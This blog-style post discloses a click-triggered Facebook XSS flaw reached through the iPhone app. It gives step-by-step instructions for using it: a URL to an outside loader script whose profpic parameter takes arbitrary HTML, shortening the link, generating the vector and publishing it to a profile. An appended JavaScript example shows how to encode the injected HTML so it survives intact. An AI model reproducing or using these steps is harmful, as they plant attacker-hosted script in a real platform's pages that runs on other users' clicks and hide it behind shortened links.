Facebook XSS again. This time it is activated onClick via the Facebook iPhone application. I decided to reveal this to the public, as one of our friends found it accidentally and many have also posted it publicly on their walls; sooner or later they will find out and patch this vulnerability again anyway. This XSS vulnerability was actually found back in 2009. I used it before, via the old “profile box”, to load XSS on my profile. I didn’t use it at that time as it is actually activated onClick, meaning that the script loads on the user’s click, not automatically.
This time we will post the XSS vector via the iPhone app. If you want to see a real Facebook layout on your own profile, without any add-on, follow these steps carefully:
- Customize this URL to your own needs:
http://static.int.crazydavinci.net/facebook/fb_layout.js?text=Welcome to my profile&mp3=http://crazydavinci.info/music/TrailofTears-SignofTheSameless.mp3&profpic=<img width=200 src=http://static.int.crazydavinci.net/images/facebook-logo.png />
Important: for the profpic parameter, if your HTML code contains an “&” character, you must replace every “&” with %26 or the code won’t work (an unencoded “&” ends the profpic value and starts a new query parameter, so the rest of your HTML is lost).
- Replace the parameter values (the red part in the original) with your own:
text = running text on your profile name
mp3 = autoplay mp3 as background music
profpic = innerHTML code for your profile picture (you can also use an swf embed)
- Shorten the long URL above using any URL shortener, like tinyurl.com, is.gd, tiny.cc, goo.gl, etc.
- CLICK HERE to generate the XSS vector
- Press the Publish button
- Enjoy your layout
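Why the “&” in profpic has to become %26, shown as an added example that is not part of the original post or of fb_layout.js itself. The base URL and the parameter names (text, mp3, profpic) are from the post; the sample <img> tag with a query string in its src is constructed for the demo, and it is assumed that the loader script reads its parameters the way a standard query-string parser does (the real fb_layout.js is not available here).

```javascript
// Added example (not code from the original post). Builds the fb_layout.js URL
// two ways and parses each back with a standard query-string parser, to show
// that an unencoded "&" inside the profpic HTML truncates the value.
const BASE = 'http://static.int.crazydavinci.net/facebook/fb_layout.js';

// Naive version: values pasted raw into the query string, as typed by hand.
function buildUrlRaw(params) {
  const query = Object.entries(params)
    .map(([k, v]) => `${k}=${v}`)
    .join('&');
  return `${BASE}?${query}`;
}

// Correct version: every value percent-encoded, so "&" becomes %26 (and "=",
// "<", ">", "/" and spaces are encoded too, which the parser reverses).
function buildUrlEncoded(params) {
  const query = Object.entries(params)
    .map(([k, v]) => `${k}=${encodeURIComponent(v)}`)
    .join('&');
  return `${BASE}?${query}`;
}

// Parse the query string back into an object, as any standard query parser
// (assumed here for fb_layout.js) would see it. URLSearchParams splits on "&"
// and decodes %26 back to a literal "&".
function parseLayoutUrl(url) {
  const out = {};
  for (const [k, v] of new URL(url).searchParams) out[k] = v;
  return out;
}

// Constructed sample: the <img> src carries its own query string, so the
// profpic value itself contains an "&".
const sample = {
  text: 'Welcome to my profile',
  mp3: 'http://crazydavinci.info/music/TrailofTears-SignofTheSameless.mp3',
  profpic: '<img width=200 src="http://static.int.crazydavinci.net/pic.png?w=200&h=200" />',
};

// Raw: profpic is cut at "&", and a stray "h" parameter appears.
console.log(parseLayoutUrl(buildUrlRaw(sample)));
// Encoded: all three values survive the round trip intact.
console.log(parseLayoutUrl(buildUrlEncoded(sample)));
```

The same rule applies to every other character with a meaning in a query string: encodeURIComponent covers “=”, “#” and “+” as well, so running the whole profpic value through it (rather than hand-replacing “&” only) is the safer habit.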
Happy tweaking